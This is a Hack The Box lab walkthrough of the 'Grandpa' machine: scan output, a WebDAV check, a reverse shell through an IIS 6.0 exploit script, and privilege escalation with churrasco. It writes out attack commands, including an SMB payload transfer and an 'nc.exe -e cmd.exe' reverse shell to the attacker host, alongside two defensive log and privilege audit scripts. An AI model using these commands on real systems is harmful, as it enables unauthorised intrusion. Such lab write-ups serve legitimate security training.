This is a walkthrough of the Grandpa box from Hack The Box, done without using Metasploit.
1. Reconnaissance
I learned about this awesome all-in-one nmap script called nmapAutomator. I will use it to run all my scans at once:
./nmapAutomator.sh 10.10.10.14 All
- All = runs all the scans consecutively
- Note: This scan took about 30 minutes to run for me. But you will get some info right away, so you can use that while the rest of the scan is completing. In the case of this scan, the most helpful bit (the default creds) didn’t show up until about 25 min into the scan. Just something to keep in mind as you are trying to allocate your time accordingly.
Here are the results we get:
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Error
| http-webdav-scan:
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
|   Server Date: Mon, 05 Oct 2020 18:31:32 GMT
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_  WebDAV type: Unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.32 seconds

----------------------Starting Nmap UDP Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 18:29 EST
Nmap scan report for 10.10.10.14
Host is up.
All 1000 scanned ports on 10.10.10.14 are open|filtered

Nmap done: 1 IP address (1 host up) scanned in 201.72 seconds

---------------------Starting Nmap Full Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 18:32 EST
Initiating Parallel DNS resolution of 1 host. at 18:32
Completed Parallel DNS resolution of 1 host. at 18:32, 0.43s elapsed
Initiating SYN Stealth Scan at 18:32
Scanning 10.10.10.14 [65535 ports]
Discovered open port 80/tcp on 10.10.10.14
....
Nmap scan report for 10.10.10.14
Host is up (0.039s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 263.21 seconds
           Raw packets sent: 131268 (5.776MB) | Rcvd: 214 (10.752KB)

No new ports

---------------------Starting Nmap Vulns Scan---------------------

Running CVE scan on basic ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 18:37 EST
/usr/local/bin/nmapAutomator.sh: line 226:  2251 Segmentation fault      $nmapType -sV --script vulners --script-args mincvss=7.0 -p$(echo "${ports}") -oN nmap/CVEs_"$1".nmap "$1"

Running Vuln scan on basic ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 18:37 EST
/usr/local/bin/nmapAutomator.sh: line 226:  2253 Segmentation fault      $nmapType -sV --script vuln -p$(echo "${ports}") -oN nmap/Vulns_"$1".nmap "$1"

---------------------Recon Recommendations----------------------

Web Servers Recon:

gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.asp,.php -u http://10.10.10.14:80 -o recon/gobuster_10.10.10.14_80.txt
nikto -host 10.10.10.14:80 | tee recon/nikto_10.10.10.14_80.txt

Which commands would you like to run?
All (Default), gobuster, nikto, Skip <!>
Running Default in (1) s:

---------------------Running Recon Commands----------------------

Starting gobuster scan

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.14:80
[+] Threads:        30
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Show length:    true
[+] Extensions:     html,asp,php
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/10/05 18:38:11 Starting gobuster
===============================================================
http://10.10.10.14:80/_vti_bin (Status: 301) [Size: 158]
http://10.10.10.14:80/_vti_bin/_vti_aut/author.dll (Status: 200) [Size: 195]
http://10.10.10.14:80/_vti_bin/_vti_adm/admin.dll (Status: 200) [Size: 195]
http://10.10.10.14:80/_vti_bin/shtml.dll (Status: 200) [Size: 96]
===============================================================
2020/10/05 18:39:06 Finished
===============================================================

Finished gobuster scan
=========================

Starting nikto scan

- Nikto v2.1.6
--------------------------------------------------------------------
+ Target IP:          10.10.10.14
+ Target Hostname:    10.10.10.14
+ Target Port:        80
+ Start Time:         2020-10-05 18:39:07 (GMT-5)
--------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Retrieved dasl header: <DAV:sql>
+ Retrieved dav header: 1, 2
+ Retrieved ms-author-via header: MS-FP/4.0,DAV
+ Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (PROPPATCH COPY LOCK PROPFIND MKCOL UNLOCK SEARCH listed as allowed)
+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://10.10.10.14/
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
+ Retrieved x-aspnet-version header: 1.1.4322
+ 8014 requests: 0 error(s) and 22 item(s) reported on remote host
Things to note:
- Only port 80 was open, running Microsoft IIS httpd 6.0 (which means the box is probably Windows Server 2003 or Windows XP)
- WebDAV is enabled (just like in Granny)
- Web Distributed Authoring and Versioning (WebDAV) is an HTTP extension designed to let people create and modify web sites over HTTP
- The HTTP methods PUT, MOVE and DELETE are allowed (which means we should be able to add, rename and remove files on this web server)
2. Enumeration
Open a web browser and visit the IP
The site is under construction. There was nothing useful in the directories that gobuster found either.
The scan results told us that the PUT method is allowed, so we can test whether it actually works. IIS 6.0 can execute .asp and .aspx pages. Let's use davtest to see whether those file types can actually be uploaded:
davtest --url http://10.10.10.14
Unfortunately it doesn’t look like uploading those file types will be possible.
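As an added defender's counterpart to the davtest probe above (example code, not from the walkthrough): IIS 6.0 records every WebDAV request in its W3C log, so the PUT, MKCOL and PROPFIND traffic that nmap and nikto flagged as risky is visible to the server owner. The log lines, client IP usage and the webdav-probe/1.0 user agent are constructed.

```python
# Added example (not from the walkthrough): flag WebDAV write and authoring
# activity in IIS W3C log lines. The log below is constructed to mimic the
# IIS 6.0 W3C extended format; column order comes from its #Fields line.
from collections import Counter

# Content-changing vs. enumeration-only methods, as listed by nmap/nikto above.
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}
AUTHORING_METHODS = {"PROPFIND", "SEARCH", "OPTIONS", "TRACE"}

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2020-10-05 18:38:12 10.10.10.14 GET /default.htm - 80 - 10.10.14.2 Mozilla/5.0 200 0 0
2020-10-05 18:40:01 10.10.10.14 OPTIONS / - 80 - 10.10.14.2 webdav-probe/1.0 200 0 0
2020-10-05 18:40:02 10.10.10.14 MKCOL /DavTestDir_x - 80 - 10.10.14.2 webdav-probe/1.0 201 0 0
2020-10-05 18:40:03 10.10.10.14 PUT /DavTestDir_x/test.txt - 80 - 10.10.14.2 webdav-probe/1.0 201 0 0
2020-10-05 18:40:04 10.10.10.14 PUT /DavTestDir_x/test.aspx - 80 - 10.10.14.2 webdav-probe/1.0 403 0 0
2020-10-05 18:40:05 10.10.10.14 PROPFIND / - 80 - 10.10.14.2 webdav-probe/1.0 207 0 0
"""

def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in #Fields."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) == len(fields):  # skip malformed lines, don't misalign
            yield dict(zip(fields, values))

def webdav_findings(text):
    """Return (write_hits, per_client_counts).
    write_hits: (client_ip, method, uri, status) per content-changing request;
    a 2xx status means the write landed, 403 means it was only attempted.
    per_client_counts: write + authoring requests seen per client IP."""
    hits, counts = [], Counter()
    for rec in parse_w3c(text):
        method = rec["cs-method"].upper()
        if method in WRITE_METHODS:
            hits.append((rec["c-ip"], method, rec["cs-uri-stem"], int(rec["sc-status"])))
        if method in WRITE_METHODS | AUTHORING_METHODS:
            counts[rec["c-ip"]] += 1
    return hits, counts

if __name__ == "__main__":
    for ip, method, uri, status in webdav_findings(SAMPLE_LOG)[0]:
        print(f"{ip} {method} {uri} -> {status}")
```

On a server that is not meant to be authored over HTTP, any entry in write_hits with a 2xx status is a change that landed and is worth investigating.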
3. Initial foothold
This script (iis_rev_shell.py) creates a reverse shell without any edits. Just set up a listener and run the script:
nc -nlvp 4444
python iis_rev_shell.py 10.10.10.14 80 10.10.14.2 4444
- 80 is the target port, since the victim box is a web server
- I chose port 4444 for my listener
We got a reverse shell! Running whoami shows that we are not root. Running whoami /priv shows what privileges we have. Because we are not root, we will need to do some privilege escalation.
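The same whoami /priv check, turned into an audit script a defender can run across service accounts (added example, not from the walkthrough): a web-server account holding SeImpersonatePrivilege is exactly the condition the escalation later in this walkthrough relies on. The whoami /priv output below is constructed.

```python
# Added example (not from the walkthrough): audit `whoami /priv` output for the
# token privileges that let a compromised low-privileged account escalate.
# SAMPLE_WHOAMI_PRIV is constructed in the format whoami /priv prints.

# Microsoft documents these two as equivalent to full administrative rights
# when a service account holds them; SeImpersonatePrivilege is the one the
# walkthrough finds enabled. Extend the set to match your own baseline.
HIGH_RISK = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

SAMPLE_WHOAMI_PRIV = """\

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAuditPrivilege              Generate security audits                  Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

def parse_privs(text):
    """Return {privilege_name: state} from whoami /priv output.

    Each row is name, free-text description, state. The description can
    contain spaces, so only the first and last whitespace-separated tokens
    are trusted; header, separator and blank lines are skipped.
    """
    privs = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0].startswith("Se"):
            privs[parts[0]] = parts[-1]
    return privs

def risky_enabled(text):
    """Sorted names of HIGH_RISK privileges whose state is Enabled."""
    return sorted(name for name, state in parse_privs(text).items()
                  if name in HIGH_RISK and state == "Enabled")

if __name__ == "__main__":
    print(risky_enabled(SAMPLE_WHOAMI_PRIV))  # ['SeImpersonatePrivilege']
```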
4. Privilege escalation
For privilege escalation, we will need to get some sort of exploit over to the web server and execute it. That means we'll need to upload the file to a directory we can write to and execute from.
While digging around I see there is a directory called wmpub, which makes me think "public" and possibly something we can work with. Navigate into the directory, create a test file and check that you can write it and read it back:
echo test > test.txt
type test.txt
That worked! Now we need to find an exploit we can upload to this directory.
If we remember back to when we ran whoami /priv, we know that SeImpersonatePrivilege is enabled. That means we can use churrasco like we did on the Granny box.
git clone https://github.com/Re4son/Churrasco.git
The file we need in there is churrasco.exe. We can upload this to the wmpub directory on the victim box (where we've already confirmed we can write files). In order to upload (or PUT) this file on the victim box, we'll set up a file server on our machine.
Kali has a built-in Python SMB server (smbserver.py). Find it and copy it to the directory you want to work in. Also find your netcat binary (nc.exe) and copy it to the same directory as churrasco.exe (in my case the /Churrasco/ directory). Then navigate to that directory and run the following:
python smbserver.py grandpatmp /home/churr0s/Documents/HTB/grandpa/Churrasco/
- grandpatmp is the “share folder” I’m creating, that the victim box will be able to access to grab the churrasco executable and copy it over
- I’m sharing the entire contents of the /Churrasco/ directory from my end
Now we can copy over both the netcat binary and the churrasco executable:
copy \\10.10.14.2\grandpatmp\nc.exe .
copy \\10.10.14.2\grandpatmp\churrasco.exe c.exe
- I'm saving churrasco.exe on the victim box under the shorter name c.exe
Now open up a new terminal window and set up a second listener. I chose port 6666.
Go back to your victim box and execute churrasco, passing it the netcat reverse-shell command to run:
.\c.exe -d "C:\wmpub\nc.exe -e cmd.exe 10.10.14.2 6666"
On your new listener you should see a reverse shell spawned. Run whoami and see you are now root!
Grab flags: